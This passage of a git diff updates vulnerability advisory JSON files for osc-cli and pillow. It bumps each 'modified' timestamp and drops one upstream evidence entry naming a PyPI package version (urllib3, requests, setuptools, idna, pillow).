"2026-08-13T17:24:18Z", - "modified": "2026-08-13T17:24:18Z", + "modified": "2026-09-10T20:16:54Z", "upstream": [ "GHSA-www2-v7xj-xrc6", "CVE-2018-20060", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-osc-cli-CVE-2018-25091.json b/advisories/BREW-osc-cli-CVE-2018-25091.json index 777ed45464b..7327c51accf 100644 --- a/advisories/BREW-osc-cli-CVE-2018-25091.json +++ b/advisories/BREW-osc-cli-CVE-2018-25091.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-osc-cli-CVE-2018-25091", "published": "2026-08-13T17:24:18Z", - "modified": "2026-08-13T17:24:18Z", + "modified": "2026-09-10T20:16:54Z", "upstream": [ "GHSA-gwvm-45gx-3cf8", "CVE-2018-25091", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-osc-cli-CVE-2019-11236.json b/advisories/BREW-osc-cli-CVE-2019-11236.json index f9db17c2dd1..b240b212e95 100644 --- a/advisories/BREW-osc-cli-CVE-2019-11236.json +++ b/advisories/BREW-osc-cli-CVE-2019-11236.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-osc-cli-CVE-2019-11236", "published": "2026-08-13T17:24:18Z", - "modified": "2026-08-13T17:24:18Z", + "modified": "2026-09-10T20:16:54Z", "upstream": [ "GHSA-r64q-w8jr-g9qp", "CVE-2019-11236", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-osc-cli-CVE-2019-11324.json b/advisories/BREW-osc-cli-CVE-2019-11324.json index 90252c87def..b536453bcca 100644 --- a/advisories/BREW-osc-cli-CVE-2019-11324.json +++ b/advisories/BREW-osc-cli-CVE-2019-11324.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-osc-cli-CVE-2019-11324", "published": "2026-08-13T17:24:18Z", - "modified": "2026-08-13T17:24:18Z", + "modified": "2026-09-10T20:16:54Z", "upstream": [ "GHSA-mh33-7rrq-662w", "CVE-2019-11324", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-osc-cli-CVE-2020-26137.json b/advisories/BREW-osc-cli-CVE-2020-26137.json index 58e6e0f23c1..85562e2745a 100644 --- a/advisories/BREW-osc-cli-CVE-2020-26137.json +++ b/advisories/BREW-osc-cli-CVE-2020-26137.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-osc-cli-CVE-2020-26137", "published": "2026-08-13T17:24:18Z", - "modified": "2026-08-13T17:24:18Z", + "modified": "2026-09-10T20:16:54Z", "upstream": [ "GHSA-wqvq-5m8c-6g24", "CVE-2020-26137", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-osc-cli-CVE-2020-7212.json b/advisories/BREW-osc-cli-CVE-2020-7212.json index a11525110b6..69c9a57d86d 100644 --- a/advisories/BREW-osc-cli-CVE-2020-7212.json +++ b/advisories/BREW-osc-cli-CVE-2020-7212.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-osc-cli-CVE-2020-7212", "published": "2026-08-13T17:24:18Z", - "modified": "2026-08-13T17:24:18Z", + "modified": "2026-09-10T20:16:54Z", "upstream": [ "GHSA-hmv2-79q8-fv6g", "CVE-2020-7212", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-osc-cli-CVE-2021-28363.json b/advisories/BREW-osc-cli-CVE-2021-28363.json index 1c3b208fa01..c91207ff40b 100644 --- a/advisories/BREW-osc-cli-CVE-2021-28363.json +++ b/advisories/BREW-osc-cli-CVE-2021-28363.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-osc-cli-CVE-2021-28363", "published": "2026-08-13T17:24:18Z", - "modified": "2026-08-13T17:24:18Z", + "modified": "2026-09-10T20:16:54Z", "upstream": [ "GHSA-5phf-pp7p-vc2r", "CVE-2021-28363", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-osc-cli-CVE-2021-33503.json b/advisories/BREW-osc-cli-CVE-2021-33503.json index 38f86443bcd..25d2274fb39 100644 --- a/advisories/BREW-osc-cli-CVE-2021-33503.json +++ b/advisories/BREW-osc-cli-CVE-2021-33503.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-osc-cli-CVE-2021-33503", "published": "2026-08-13T17:24:18Z", - "modified": "2026-08-13T17:24:18Z", + "modified": "2026-09-10T20:16:54Z", "upstream": [ "GHSA-q2q7-5pp4-w6pg", "CVE-2021-33503", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-osc-cli-CVE-2022-40897.json b/advisories/BREW-osc-cli-CVE-2022-40897.json index e408b77a531..41f466e09d7 100644 --- a/advisories/BREW-osc-cli-CVE-2022-40897.json +++ b/advisories/BREW-osc-cli-CVE-2022-40897.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-osc-cli-CVE-2022-40897", "published": "2026-08-13T17:24:18Z", - "modified": "2026-08-13T17:24:18Z", + "modified": "2026-09-10T20:16:54Z", "upstream": [ "GHSA-r9hx-vwmv-q579", "BIT-setuptools-2022-40897", @@ -43,14 +43,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "setuptools", - "subject_version": "83.0.0", - "key": "pkg:pypi/setuptools@83.0.0", - "resource": "setuptools" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-osc-cli-CVE-2023-32681.json b/advisories/BREW-osc-cli-CVE-2023-32681.json index 6d12ba56528..cf87375afb0 100644 --- a/advisories/BREW-osc-cli-CVE-2023-32681.json +++ b/advisories/BREW-osc-cli-CVE-2023-32681.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-osc-cli-CVE-2023-32681", "published": "2026-08-13T17:24:18Z", - "modified": "2026-08-13T17:24:18Z", + "modified": "2026-09-10T20:16:54Z", "upstream": [ "GHSA-j8r2-6x86-q33q", "CVE-2023-32681", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "requests", - "subject_version": "2.34.2", - "key": "pkg:pypi/requests@2.34.2", - "resource": "requests" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-osc-cli-CVE-2023-43804.json b/advisories/BREW-osc-cli-CVE-2023-43804.json index 22c9d3d9a07..4662f483465 100644 --- a/advisories/BREW-osc-cli-CVE-2023-43804.json +++ b/advisories/BREW-osc-cli-CVE-2023-43804.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-osc-cli-CVE-2023-43804", "published": "2026-08-13T17:24:18Z", - "modified": "2026-08-13T17:24:18Z", + "modified": "2026-09-10T20:16:54Z", "upstream": [ "GHSA-v845-jxx5-vc9f", "CVE-2023-43804", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-osc-cli-CVE-2023-45803.json b/advisories/BREW-osc-cli-CVE-2023-45803.json index 3ac7d798c28..594bb56a02e 100644 --- a/advisories/BREW-osc-cli-CVE-2023-45803.json +++ b/advisories/BREW-osc-cli-CVE-2023-45803.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-osc-cli-CVE-2023-45803", "published": "2026-08-13T17:24:18Z", - "modified": "2026-08-13T17:24:18Z", + "modified": "2026-09-10T20:16:54Z", "upstream": [ "GHSA-g4mx-q9vg-27p4", "CVE-2023-45803", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-osc-cli-CVE-2024-35195.json b/advisories/BREW-osc-cli-CVE-2024-35195.json index ef984252160..0ab01fd670c 100644 --- a/advisories/BREW-osc-cli-CVE-2024-35195.json +++ b/advisories/BREW-osc-cli-CVE-2024-35195.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-osc-cli-CVE-2024-35195", "published": "2026-08-13T17:24:18Z", - "modified": "2026-08-13T17:24:18Z", + "modified": "2026-09-10T20:16:54Z", "upstream": [ "GHSA-9wx4-h78v-vm56", "CVE-2024-35195", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "requests", - "subject_version": "2.34.2", - "key": "pkg:pypi/requests@2.34.2", - "resource": "requests" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-osc-cli-CVE-2024-3651.json b/advisories/BREW-osc-cli-CVE-2024-3651.json index 49dcc5d975b..6ad483ba852 100644 --- a/advisories/BREW-osc-cli-CVE-2024-3651.json +++ b/advisories/BREW-osc-cli-CVE-2024-3651.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-osc-cli-CVE-2024-3651", "published": "2026-08-13T17:24:18Z", - "modified": "2026-08-13T17:24:18Z", + "modified": "2026-09-10T20:16:54Z", "upstream": [ "GHSA-jjg7-2v4v-x38h", "CVE-2024-3651", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "idna", - "subject_version": "3.18", - "key": "pkg:pypi/idna@3.18", - "resource": "idna" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-osc-cli-CVE-2024-37891.json b/advisories/BREW-osc-cli-CVE-2024-37891.json index c03bc4c2bc4..9950f78ea53 100644 --- a/advisories/BREW-osc-cli-CVE-2024-37891.json +++ b/advisories/BREW-osc-cli-CVE-2024-37891.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-osc-cli-CVE-2024-37891", "published": "2026-08-13T17:24:18Z", - "modified": "2026-08-13T17:24:18Z", + "modified": "2026-09-10T20:16:54Z", "upstream": [ "GHSA-34jh-p97f-mpxf", "CVE-2024-37891", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-osc-cli-CVE-2024-47081.json b/advisories/BREW-osc-cli-CVE-2024-47081.json index 5b2238fd267..5eb7e77c69c 100644 --- a/advisories/BREW-osc-cli-CVE-2024-47081.json +++ b/advisories/BREW-osc-cli-CVE-2024-47081.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-osc-cli-CVE-2024-47081", "published": "2026-08-13T17:24:18Z", - "modified": "2026-08-13T17:24:18Z", + "modified": "2026-09-10T20:16:54Z", "upstream": [ "GHSA-9hjg-9r4m-mvj7", "CVE-2024-47081", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "requests", - "subject_version": "2.34.2", - "key": "pkg:pypi/requests@2.34.2", - "resource": "requests" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-osc-cli-CVE-2024-6345.json b/advisories/BREW-osc-cli-CVE-2024-6345.json index 3f97cf86ffc..2f5ab62ee31 100644 --- a/advisories/BREW-osc-cli-CVE-2024-6345.json +++ b/advisories/BREW-osc-cli-CVE-2024-6345.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-osc-cli-CVE-2024-6345", "published": "2026-08-13T17:24:18Z", - "modified": "2026-08-13T17:24:18Z", + "modified": "2026-09-10T20:16:54Z", "upstream": [ "GHSA-cx63-2mw6-8hw5", "BIT-setuptools-2024-6345", @@ -43,14 +43,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "setuptools", - "subject_version": "83.0.0", - "key": "pkg:pypi/setuptools@83.0.0", - "resource": "setuptools" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-osc-cli-CVE-2025-47273.json b/advisories/BREW-osc-cli-CVE-2025-47273.json index dcac4e2581e..98e0d1bb4da 100644 --- a/advisories/BREW-osc-cli-CVE-2025-47273.json +++ b/advisories/BREW-osc-cli-CVE-2025-47273.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-osc-cli-CVE-2025-47273", "published": "2026-08-13T17:24:18Z", - "modified": "2026-08-13T17:24:18Z", + "modified": "2026-09-10T20:16:54Z", "upstream": [ "GHSA-5rjg-fvgr-3xxf", "BIT-setuptools-2025-47273", @@ -43,14 +43,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "setuptools", - "subject_version": "83.0.0", - "key": "pkg:pypi/setuptools@83.0.0", - "resource": "setuptools" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-osc-cli-CVE-2025-50181.json b/advisories/BREW-osc-cli-CVE-2025-50181.json index eb6f66672c9..24ee133f7c1 100644 --- a/advisories/BREW-osc-cli-CVE-2025-50181.json +++ b/advisories/BREW-osc-cli-CVE-2025-50181.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-osc-cli-CVE-2025-50181", "published": "2026-08-13T17:24:18Z", - "modified": "2026-08-13T17:24:18Z", + "modified": "2026-09-10T20:16:54Z", "upstream": [ "GHSA-pq67-6m6q-mj2v", "CVE-2025-50181", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-osc-cli-CVE-2025-50182.json b/advisories/BREW-osc-cli-CVE-2025-50182.json index 13936743a0e..c95af36e256 100644 --- a/advisories/BREW-osc-cli-CVE-2025-50182.json +++ b/advisories/BREW-osc-cli-CVE-2025-50182.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-osc-cli-CVE-2025-50182", "published": "2026-08-13T17:24:18Z", - "modified": "2026-08-13T17:24:18Z", + "modified": "2026-09-10T20:16:54Z", "upstream": [ "GHSA-48p4-8xcf-vxj5", "CVE-2025-50182", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-osc-cli-CVE-2025-66418.json b/advisories/BREW-osc-cli-CVE-2025-66418.json index dbf1c942884..2a1a75808a1 100644 --- a/advisories/BREW-osc-cli-CVE-2025-66418.json +++ b/advisories/BREW-osc-cli-CVE-2025-66418.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-osc-cli-CVE-2025-66418", "published": "2026-08-13T17:24:18Z", - "modified": "2026-08-13T17:24:18Z", + "modified": "2026-09-10T20:16:54Z", "upstream": [ "GHSA-gm62-xv2j-4w53", "CVE-2025-66418", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-osc-cli-CVE-2025-66471.json b/advisories/BREW-osc-cli-CVE-2025-66471.json index 0bb36d9e028..7f1719287a3 100644 --- a/advisories/BREW-osc-cli-CVE-2025-66471.json +++ b/advisories/BREW-osc-cli-CVE-2025-66471.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-osc-cli-CVE-2025-66471", "published": "2026-08-13T17:24:18Z", - "modified": "2026-08-13T17:24:18Z", + "modified": "2026-09-10T20:16:54Z", "upstream": [ "GHSA-2xpw-w6gg-jr37", "CVE-2025-66471", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-osc-cli-CVE-2026-21441.json b/advisories/BREW-osc-cli-CVE-2026-21441.json index a5fed7b6b52..ab00941c1ef 100644 --- a/advisories/BREW-osc-cli-CVE-2026-21441.json +++ b/advisories/BREW-osc-cli-CVE-2026-21441.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-osc-cli-CVE-2026-21441", "published": "2026-08-13T17:24:18Z", - "modified": "2026-08-13T17:24:18Z", + "modified": "2026-09-10T20:16:54Z", "upstream": [ "GHSA-38jv-5279-wg99", "CVE-2026-21441", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-osc-cli-CVE-2026-25645.json b/advisories/BREW-osc-cli-CVE-2026-25645.json index de37a4d699c..e3caf1d0e02 100644 --- a/advisories/BREW-osc-cli-CVE-2026-25645.json +++ b/advisories/BREW-osc-cli-CVE-2026-25645.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-osc-cli-CVE-2026-25645", "published": "2026-08-13T17:24:18Z", - "modified": "2026-08-13T17:24:18Z", + "modified": "2026-09-10T20:16:54Z", "upstream": [ "GHSA-gc5v-m9x4-r6x2", "CVE-2026-25645", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "requests", - "subject_version": "2.34.2", - "key": "pkg:pypi/requests@2.34.2", - "resource": "requests" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-osc-cli-CVE-2026-44431.json b/advisories/BREW-osc-cli-CVE-2026-44431.json index 1bba6401225..3fbf8dc7571 100644 --- a/advisories/BREW-osc-cli-CVE-2026-44431.json +++ b/advisories/BREW-osc-cli-CVE-2026-44431.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-osc-cli-CVE-2026-44431", "published": "2026-08-13T17:24:18Z", - "modified": "2026-08-13T17:24:18Z", + "modified": "2026-09-10T20:16:54Z", "upstream": [ "GHSA-qccp-gfcp-xxvc", "CVE-2026-44431", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-osc-cli-CVE-2026-44432.json b/advisories/BREW-osc-cli-CVE-2026-44432.json index d179b95a68c..87fd2b2143a 100644 --- a/advisories/BREW-osc-cli-CVE-2026-44432.json +++ b/advisories/BREW-osc-cli-CVE-2026-44432.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-osc-cli-CVE-2026-44432", "published": "2026-08-13T17:24:18Z", - "modified": "2026-08-13T17:24:18Z", + "modified": "2026-09-10T20:16:54Z", "upstream": [ "GHSA-mf9v-mfxr-j63j", "CVE-2026-44432", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-osc-cli-CVE-2026-45409.json b/advisories/BREW-osc-cli-CVE-2026-45409.json index e6e9240108a..475fb816295 100644 --- a/advisories/BREW-osc-cli-CVE-2026-45409.json +++ b/advisories/BREW-osc-cli-CVE-2026-45409.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-osc-cli-CVE-2026-45409", "published": "2026-08-13T17:24:18Z", - "modified": "2026-08-13T17:24:18Z", + "modified": "2026-09-10T20:16:54Z", "upstream": [ "GHSA-65pc-fj4g-8rjx", "CVE-2026-45409", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "idna", - "subject_version": "3.18", - "key": "pkg:pypi/idna@3.18", - "resource": "idna" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-osc-cli-CVE-2026-59890.json b/advisories/BREW-osc-cli-CVE-2026-59890.json index 8169652e810..97c9eaeba79 100644 --- a/advisories/BREW-osc-cli-CVE-2026-59890.json +++ b/advisories/BREW-osc-cli-CVE-2026-59890.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-osc-cli-CVE-2026-59890", "published": "2026-08-13T17:24:18Z", - "modified": "2026-08-13T17:24:18Z", + "modified": "2026-09-10T20:16:54Z", "upstream": [ "GHSA-h35f-9h28-mq5c", "BIT-setuptools-2026-59890", @@ -43,14 +43,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "setuptools", - "subject_version": "83.0.0", - "key": "pkg:pypi/setuptools@83.0.0", - "resource": "setuptools" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-pillow-CVE-2014-1932.json b/advisories/BREW-pillow-CVE-2014-1932.json index 0e3dae9b7ca..a193c2d8548 100644 --- a/advisories/BREW-pillow-CVE-2014-1932.json +++ b/advisories/BREW-pillow-CVE-2014-1932.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-pillow-CVE-2014-1932", "published": "2026-08-13T17:28:20Z", - "modified": "2026-08-13T17:28:20Z", + "modified": "2026-09-10T20:25:15Z", "upstream": [ "GHSA-x895-2wrm-hvp7", "CVE-2014-1932", @@ -40,13 +40,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pillow", - "subject_version": "12.3.0", - "key": "pkg:pypi/pillow@12.3.0" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-pillow-CVE-2014-1933.json b/advisories/BREW-pillow-CVE-2014-1933.json index 416abd50df3..c44d48a12bd 100644 --- a/advisories/BREW-pillow-CVE-2014-1933.json +++ b/advisories/BREW-pillow-CVE-2014-1933.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-pillow-CVE-2014-1933", "published": "2026-08-13T17:28:20Z", - "modified": "2026-08-13T17:28:20Z", + "modified": "2026-09-10T20:25:15Z", "upstream": [ "GHSA-r854-96gq-rfg3", "CVE-2014-1933", @@ -40,13 +40,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pillow", - "subject_version": "12.3.0", - "key": "pkg:pypi/pillow@12.3.0" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-pillow-CVE-2014-3007.json b/advisories/BREW-pillow-CVE-2014-3007.json index a8fe6243e6e..a00038288f7 100644 --- a/advisories/BREW-pillow-CVE-2014-3007.json +++ b/advisories/BREW-pillow-CVE-2014-3007.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-pillow-CVE-2014-3007", "published": "2026-08-13T17:28:20Z", - "modified": "2026-08-13T17:28:20Z", + "modified": "2026-09-10T20:25:15Z", "upstream": [ "GHSA-8m9x-pxwq-j236", "CVE-2014-3007", @@ -40,13 +40,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pillow", - "subject_version": "12.3.0", - "key": "pkg:pypi/pillow@12.3.0" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-pillow-CVE-2014-3589.json b/advisories/BREW-pillow-CVE-2014-3589.json index 31b4a5d066b..5b0c97252d6 100644 --- a/advisories/BREW-pillow-CVE-2014-3589.json +++ b/advisories/BREW-pillow-CVE-2014-3589.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-pillow-CVE-2014-3589", "published": "2026-08-13T17:28:20Z", - "modified": "2026-08-13T17:28:20Z", + "modified": "2026-09-10T20:25:15Z", "upstream": [ "GHSA-cfmr-38g9-f2h7", "CVE-2014-3589", @@ -40,13 +40,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pillow", - "subject_version": "12.3.0", - "key": "pkg:pypi/pillow@12.3.0" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-pillow-CVE-2014-3598.json b/advisories/BREW-pillow-CVE-2014-3598.json index 5879f53a40b..99e0b1643f7 100644 --- a/advisories/BREW-pillow-CVE-2014-3598.json +++ b/advisories/BREW-pillow-CVE-2014-3598.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-pillow-CVE-2014-3598", "published": "2026-08-13T17:28:20Z", - "modified": "2026-08-13T17:28:20Z", + "modified": "2026-09-10T20:25:15Z", "upstream": [ "GHSA-j6f7-g425-4gmx", "CVE-2014-3598", @@ -40,13 +40,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pillow", - "subject_version": "12.3.0", - "key": "pkg:pypi/pillow@12.3.0" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-pillow-CVE-2014-9601.json b/advisories/BREW-pillow-CVE-2014-9601.json index 45acd568aae..e42835fdd1a 100644 --- a/advisories/BREW-pillow-CVE-2014-9601.json +++ b/advisories/BREW-pillow-CVE-2014-9601.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-pillow-CVE-2014-9601", "published": "2026-08-13T17:28:20Z", - "modified": "2026-08-13T17:28:20Z", + "modified": "2026-09-10T20:25:15Z", "upstream": [ "GHSA-h5rf-vgqx-wjv2", "CVE-2014-9601", @@ -40,13 +40,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pillow", - "subject_version": "12.3.0", - "key": "pkg:pypi/pillow@12.3.0" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-pillow-CVE-2016-0740.json b/advisories/BREW-pillow-CVE-2016-0740.json index 4b6a2074c7a..0b8815431e2 100644 --- a/advisories/BREW-pillow-CVE-2016-0740.json +++ b/advisories/BREW-pillow-CVE-2016-0740.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-pillow-CVE-2016-0740", "published": "2026-08-13T17:28:20Z", - "modified": "2026-08-13T17:28:20Z", + "modified": 